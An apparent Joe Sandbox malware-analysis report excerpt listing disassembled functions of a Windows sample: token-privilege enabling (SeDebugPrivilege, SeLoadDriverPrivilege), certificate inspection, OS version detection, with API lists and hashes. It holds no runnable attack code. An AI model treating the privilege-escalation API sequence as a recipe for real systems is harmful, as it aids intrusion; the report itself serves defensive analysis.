                                              • Associated: 00000000.00000002.2196750619.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196771745.00000000007A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196799128.00000000007D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196818883.00000000007D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Version
                                              • String ID:
                                              • API String ID: 1889659487-0
                                              • Opcode ID: c04dfa48e3ade9305df6b90e0814d7ac56acaa11f2c05ddf316d2782b4ea8285
                                              • Instruction ID: 53074f69e8be5e8a26e660d13acfd2b8e57fd68867c852c075706b3384b4489e
                                              • Opcode Fuzzy Hash: c04dfa48e3ade9305df6b90e0814d7ac56acaa11f2c05ddf316d2782b4ea8285
                                              • Instruction Fuzzy Hash: 2CF03074D00B508BD324DF15D882A1ABBE3BF48704B14492EE8565B761D734B8018F95

                                              Non-executed Functions

                                              Function 004090DF Relevance: 47.4, APIs: 17, Strings: 10, Instructions: 164COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 169 4090df-4090ec 170 4090f5-409112 GetCurrentProcess OpenProcessToken 169->170 171 4090ee-4090f0 169->171 173 409114-409116 170->173 174 40911b-40912d LookupPrivilegeValueA 170->174 172 40929b-40929d 171->172 175 40929a 173->175 174->173 176 40912f-40914f AdjustTokenPrivileges 174->176 175->172 177 409151-409159 GetLastError 176->177 178 409175-409187 LookupPrivilegeValueA 176->178 177->178 179 40915b-40915e 177->179 180 409189-4091a3 AdjustTokenPrivileges 178->180 181 40916e-409170 178->181 184 409163-40916b call 4bc810 179->184 182 4091a5-4091ad GetLastError 180->182 183 4091b9-4091cb LookupPrivilegeValueA 180->183 185 409299 181->185 182->183 186 4091af-4091b7 182->186 183->181 187 4091cd-4091e7 AdjustTokenPrivileges 183->187 184->181 185->175 186->184 189 409200-409212 LookupPrivilegeValueA 187->189 190 4091e9-4091f1 GetLastError 187->190 189->181 193 409218-409232 AdjustTokenPrivileges 189->193 190->189 192 4091f3-4091fb 190->192 192->184 194 409234-40923c GetLastError 193->194 195 40924b-40925d LookupPrivilegeValueA 193->195 194->195 196 40923e-409246 194->196 195->181 197 409263-40927d AdjustTokenPrivileges 195->197 196->184 198 409296-409298 197->198 199 40927f-409287 GetLastError 197->199 198->185 199->198 200 409289-40928c 199->200 200->198
                                              APIs
                                              • GetCurrentProcess.KERNEL32(00000028,?), ref: 00409103
                                              • OpenProcessToken.ADVAPI32(00000000), ref: 0040910A
                                              Strings
                                              • SeProfileSingleProcessPrivilege, xrefs: 00409204
                                              • Could not enable SeProfileSingleProcessPrivilege, xrefs: 00409241
                                              • SeLoadDriverPrivilege, xrefs: 00409179
                                              • SeSystemEnvironmentPrivilege, xrefs: 0040924F
                                              • Could not enable SeDebugPrivilege, xrefs: 0040915E
                                              • Could not enable SeSystemEnvironmentPrivilege, xrefs: 0040928C
                                              • SeSecurityPrivilege, xrefs: 004091BD
                                              • Could not enable SeSecurityPrivilege, xrefs: 004091F6
                                              • SeDebugPrivilege, xrefs: 0040911F
                                              • Could not enable SeLoadDriverPrivilege, xrefs: 004091B2
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2196188016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2196171252.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196283420.00000000004E1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196320668.000000000052B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196522230.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196541089.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196562469.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196584231.0000000000700000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196635087.000000000077B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196652474.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196669073.0000000000788000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196687518.000000000078B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196707791.0000000000791000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196730512.0000000000795000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196750619.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196771745.00000000007A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196799128.00000000007D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196818883.00000000007D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Process$CurrentOpenToken
                                              • String ID: Could not enable SeDebugPrivilege$Could not enable SeLoadDriverPrivilege$Could not enable SeProfileSingleProcessPrivilege$Could not enable SeSecurityPrivilege$Could not enable SeSystemEnvironmentPrivilege$SeDebugPrivilege$SeLoadDriverPrivilege$SeProfileSingleProcessPrivilege$SeSecurityPrivilege$SeSystemEnvironmentPrivilege
                                              • API String ID: 2256020841-272810714
                                              • Opcode ID: aa4f05c840bd627e2d73487595dc64d3eda90993e1edbf8c139383d39da773a4
                                              • Instruction ID: b8165345c32a87174b9950b5c2d351cd3d9e982d028e98a03367593e3ed6d555
                                              • Opcode Fuzzy Hash: aa4f05c840bd627e2d73487595dc64d3eda90993e1edbf8c139383d39da773a4
                                              • Instruction Fuzzy Hash: 89516F70A4024ABEEB10DFA18D84EBF7BACEB04744F14443AB901F9192D778CE419A79
                                              Function 004087AE Relevance: 44.2, APIs: 14, Strings: 11, Instructions: 467encryptiontimememoryCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              APIs
                                              • _strlen.LIBCMT ref: 00408885
                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000001,?,00000104), ref: 00408892
                                              • CryptQueryObject.CRYPT32(00000001,?,00000400,00000002,00000000,?,?,?,?,?,00000000), ref: 004088CD
                                              • CryptMsgGetParam.CRYPT32(?,00000006,00000000,00000000,?), ref: 004088F8
                                              • LocalAlloc.KERNEL32(00000040,?), ref: 00408910
                                              • CryptMsgGetParam.CRYPT32(?,00000006,00000000,00000000,?), ref: 00408937
                                                • Part of subcall function 004084F3: lstrcmp.KERNEL32(1.3.6.1.4.1.311.2.1.12,?), ref: 0040852B
                                                • Part of subcall function 004084F3: CryptDecodeObject.CRYPT32(00010001,1.3.6.1.4.1.311.2.1.12,?,?,00000000,00000000,?), ref: 00408553
                                                • Part of subcall function 004084F3: LocalAlloc.KERNEL32(00000040,?), ref: 00408569
                                                • Part of subcall function 004084F3: CryptDecodeObject.CRYPT32(00010001,1.3.6.1.4.1.311.2.1.12,?,?,00000000,?,?), ref: 00408595
                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000), ref: 0040897F
                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000), ref: 004089CF
                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000), ref: 00408A1F
                                              • CertFindCertificateInStore.CRYPT32(?,00010001,00000000,000B0000,?,00000000), ref: 00408A90
                                              • _strlen.LIBCMT ref: 00408BEC
                                              • CertFindCertificateInStore.CRYPT32(?,00010001,00000000,000B0000,?,00000000), ref: 00408C64
                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 00408E14
                                              • CertVerifyTimeValidity.CRYPT32(?,?), ref: 00408E2C
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2196188016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2196171252.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196283420.00000000004E1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196320668.000000000052B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196522230.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196541089.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196562469.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196584231.0000000000700000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196635087.000000000077B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196652474.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196669073.0000000000788000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196687518.000000000078B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196707791.0000000000791000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196730512.0000000000795000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196750619.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196771745.00000000007A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196799128.00000000007D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196818883.00000000007D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Crypt$ByteCharMultiWide$CertObjectTime$AllocCertificateDecodeFindLocalParamStore_strlen$FileQuerySystemValidityVerifylstrcmp
                                              • String ID: Certificate is valid from: %02d/%02d/%04d %02d:%02d until %02d/%02d/%04d %02d:%02d $Certificate was signed on: %02d/%02d/%04d %02d:%02d$Issuer: %s$Serial: %s$Subject: %s$Signer Certificate:$Even Balance, Inc.$MoreInfo Link : %s$Program Name : %s$Publisher Link : %s$Time Stamp Certificate
                                              • API String ID: 318054356-2987722516
                                              • Opcode ID: b6ab1c5a61adf519dfdb67f66f61e91087094ad8cf8c24daf6457fb125bf4222
                                              • Instruction ID: 7d8227bbab4e461be6b82a648dd884efa89abed3f85ceb009fba5573162d0a8f
                                              • Opcode Fuzzy Hash: b6ab1c5a61adf519dfdb67f66f61e91087094ad8cf8c24daf6457fb125bf4222
                                              • Instruction Fuzzy Hash: F00210B294016CAEDB20DB95CD85EEAB7BCEB09314F0044EBB549E2541E7389F84CF65
                                              Function 004999D0 Relevance: 23.0, APIs: 1, Strings: 12, Instructions: 218COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 492 4999d0-499a2b GetVersionExA 493 499a31-499a38 492->493 494 499c17-499c27 492->494 497 499bef-499bf6 call 48da70 493->497 498 499a3e-499a3f 493->498 495 499c29-499c31 494->495 496 499c33-499c3b 494->496 502 499c45-499c5d 495->502 496->502 503 499c3d-499c41 496->503 515 499c08 497->515 516 499bf8-499c06 497->516 499 499b35-499b3b 498->499 500 499a45-499a46 498->500 506 499b3d-499b40 499->506 507 499b93-499b99 499->507 500->494 504 499a4c-499a51 500->504 508 499c69-499c80 502->508 509 499c5f-499c62 502->509 503->502 511 499abc-499ac4 504->511 512 499a53-499a5a 504->512 517 499b42-499b45 506->517 518 499b75-499b7b 506->518 513 499ba8-499baa 507->513 514 499b9b-499b9d 507->514 509->508 510 499c64 call 48a9b0 509->510 510->508 520 499b01-499b07 511->520 521 499ac6-499acd call 48da70 511->521 522 499a9a-499ab3 call 4010f0 512->522 523 499a5c-499a5d 512->523 525 499baf-499bbb call 4010f0 call 48b9e0 513->525 514->513 524 499b9f-499ba6 514->524 528 499c0d-499c12 call 48b9e0 515->528 516->528 526 499b6c-499b73 517->526 527 499b47-499b6a call 4010f0 call 48d110 517->527 529 499b8a-499b91 518->529 530 499b7d-499b7f 518->530 533 499b09-499b1e call 415030 * 2 520->533 534 499b23-499b30 call 48b950 520->534 550 499adf 521->550 551 499acf-499add 521->551 558 499ab4-499ab9 call 48d110 522->558 535 499a5f-499a60 523->535 536 499a7e-499a98 call 4010f0 523->536 524->525 562 499bc0-499bc6 525->562 526->525 527->562 528->494 529->525 530->529 541 499b81-499b88 530->541 533->534 534->494 535->511 544 499a62-499a7c call 4010f0 535->544 536->558 541->525 544->558 561 499ae4-499afe call 48d110 550->561 551->561 558->511 561->520 562->494 568 499bc8-499bed call 415030 * 2 call 48b950 562->568 568->494
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2196188016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2196171252.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196283420.00000000004E1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196320668.000000000052B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196522230.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196541089.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196562469.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196584231.0000000000700000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196635087.000000000077B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196652474.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196669073.0000000000788000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196687518.000000000078B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196707791.0000000000791000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196730512.0000000000795000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196750619.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196771745.00000000007A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196799128.00000000007D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196818883.00000000007D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Version
                                              • String ID: Win32s on Windows 3.1$Windows 2000 (build %lu$Windows 95$Windows 95 OSR2$Windows 98$Windows 98 SE$Windows 9x (%d.%d)$Windows ME$Windows NT %lu.%lu (build %lu$Windows Server 2003 (build %lu$Windows XP (build %lu$tfP
                                              • API String ID: 1889659487-1510680528
                                              • Opcode ID: 98d1be7cc305dafe69c80b41d1ab38cbc319e1e179023913ef35ca4d4df47ef8
                                              • Instruction ID: 55906365613c07ecc5b13fb5b21a5f07a9f092eab4f43b9f685ed689dae16b9b
                                              • Opcode Fuzzy Hash: 98d1be7cc305dafe69c80b41d1ab38cbc319e1e179023913ef35ca4d4df47ef8
                                              • Instruction Fuzzy Hash: 3071DF70608341AEDB24DB68DC46F6FBBE4BB84704F04892EF1858B2D1D779AC458B5A
                                              Function 00408E76 Relevance: 13.5, APIs: 9, Instructions: 39encryptionCOMMON
                                              Download Yara Rule
                                              APIs
                                              • LocalFree.KERNEL32(?,00408E51), ref: 00408E8A
                                              • LocalFree.KERNEL32(?,00408E51), ref: 00408E9A
                                              • LocalFree.KERNEL32(?,00408E51), ref: 00408EAA
                                              • LocalFree.KERNEL32(00000000,00408E51), ref: 00408EB1
                                              • LocalFree.KERNEL32(?,00408E51), ref: 00408EC1
                                              • CertFreeCRLContext.CRYPT32(?), ref: 00408ED1
                                              • CertFreeCRLContext.CRYPT32(?), ref: 00408EE5
                                              • CertCloseStore.CRYPT32(?,00000000), ref: 00408EFA
                                              • CryptMsgClose.CRYPT32(?), ref: 00408F0E
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2196188016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2196171252.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196283420.00000000004E1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196320668.000000000052B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196522230.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196541089.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196562469.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196584231.0000000000700000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196635087.000000000077B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196652474.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196669073.0000000000788000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196687518.000000000078B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196707791.0000000000791000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196730512.0000000000795000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196750619.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196771745.00000000007A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196799128.00000000007D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196818883.00000000007D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Free$Local$Cert$CloseContext$CryptStore
                                              • String ID:
                                              • API String ID: 1411909688-0
                                              • Opcode ID: 98716ab120791c0f970d4b691cb4bbbbb3a86149c7f850876c4c0de7c4e8e56f
                                              • Instruction ID: 17655f6d4f9585b093950d62dd86047068d7cbd7ae94d3a07630a22f26ce11e3
                                              • Opcode Fuzzy Hash: 98716ab120791c0f970d4b691cb4bbbbb3a86149c7f850876c4c0de7c4e8e56f
                                              • Instruction Fuzzy Hash: A6019731E061A9DBCF216F60DE844EEB672BB42351F1805FAE149709A18B350FD1DF5A
                                              Function 00401896 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 66windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • __EH_prolog.LIBCMT ref: 0040189B
                                              • GetLastError.KERNEL32(00000000,?,00000000,00000000), ref: 004018D6
                                              • FormatMessageA.KERNEL32(00001300,00000000,00000000), ref: 004018E3
                                              • LocalFree.KERNEL32(?), ref: 00401974
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2196188016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2196171252.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196283420.00000000004E1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196320668.000000000052B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196522230.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196541089.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196562469.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196584231.0000000000700000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196635087.000000000077B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196652474.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196669073.0000000000788000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196687518.000000000078B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196707791.0000000000791000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196730512.0000000000795000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196750619.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196771745.00000000007A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196799128.00000000007D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196818883.00000000007D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ErrorFormatFreeH_prologLastLocalMessage
                                              • String ID: **ERROR: %s: %s$Message
                                              • API String ID: 759219404-2348020675
                                              • Opcode ID: 22a5b4929c1e5629f02158e92ff0c09a888a439f7db0ddde2c840bdb6b1484fb
                                              • Instruction ID: 6bda246ea51a2eb7aaa526fdd861ceddc48ebf66c57801f6c4823909223e4e6e
                                              • Opcode Fuzzy Hash: 22a5b4929c1e5629f02158e92ff0c09a888a439f7db0ddde2c840bdb6b1484fb
                                              • Instruction Fuzzy Hash: B42132B194015CEFDB10EB94CC81EEDB7B8AB04318F5081BAB615621E2D6785B85CF69
                                              Function 004084F3 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 106encryptionmemorystringCOMMON
                                              Download Yara Rule
                                              APIs
                                              • lstrcmp.KERNEL32(1.3.6.1.4.1.311.2.1.12,?), ref: 0040852B
                                              • CryptDecodeObject.CRYPT32(00010001,1.3.6.1.4.1.311.2.1.12,?,?,00000000,00000000,?), ref: 00408553
                                              • LocalAlloc.KERNEL32(00000040,?), ref: 00408569
                                              • CryptDecodeObject.CRYPT32(00010001,1.3.6.1.4.1.311.2.1.12,?,?,00000000,?,?), ref: 00408595
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2196188016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2196171252.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196283420.00000000004E1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196320668.000000000052B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196522230.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196541089.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196562469.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196584231.0000000000700000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196635087.000000000077B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196652474.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196669073.0000000000788000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196687518.000000000078B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196707791.0000000000791000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196730512.0000000000795000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196750619.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196771745.00000000007A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196799128.00000000007D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196818883.00000000007D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CryptDecodeObject$AllocLocallstrcmp
                                              • String ID: 1.3.6.1.4.1.311.2.1.12
                                              • API String ID: 3284379815-2596186611
                                              • Opcode ID: 97ffdf57a553b8638c6a0d76eebed708acadcd14246dfc87692436479d3a763c
                                              • Instruction ID: c873b066cdd88eb137005279340a5094d2e94afccd150f66e497f36c002e7681
                                              • Opcode Fuzzy Hash: 97ffdf57a553b8638c6a0d76eebed708acadcd14246dfc87692436479d3a763c
                                              • Instruction Fuzzy Hash: CE416331900606EFCF208F95C94099ABBB4FF08310B15846EE995BB692DF75ED80CF58
                                              Function 004086CE Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 65encryptionmemorystringCOMMON
                                              Download Yara Rule
                                              APIs
                                              • lstrcmp.KERNEL32(?,1.2.840.113549.1.9.6), ref: 0040870A
                                              • CryptDecodeObject.CRYPT32(00010001,000001F4,?,?,00000000,00000000,?), ref: 0040873C
                                              • LocalAlloc.KERNEL32(00000040,?), ref: 0040874A
                                              • CryptDecodeObject.CRYPT32(00010001,000001F4,?,?,00000000,00000000,?), ref: 00408776
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2196188016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2196171252.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196283420.00000000004E1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196320668.000000000052B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196522230.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196541089.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196562469.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196584231.0000000000700000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196635087.000000000077B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196652474.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196669073.0000000000788000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196687518.000000000078B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196707791.0000000000791000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196730512.0000000000795000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196750619.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196771745.00000000007A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196799128.00000000007D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196818883.00000000007D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CryptDecodeObject$AllocLocallstrcmp
                                              • String ID: 1.2.840.113549.1.9.6
                                              • API String ID: 3284379815-2921522063
                                              • Opcode ID: 1c03ec7a59233b454a33b4503108e448d365118ad8ecf43816259d6b52f441a0
                                              • Instruction ID: a788b97eae109580f0cac5c22c45467d660d294b5013f0328b589f60dcf9ace9
                                              • Opcode Fuzzy Hash: 1c03ec7a59233b454a33b4503108e448d365118ad8ecf43816259d6b52f441a0
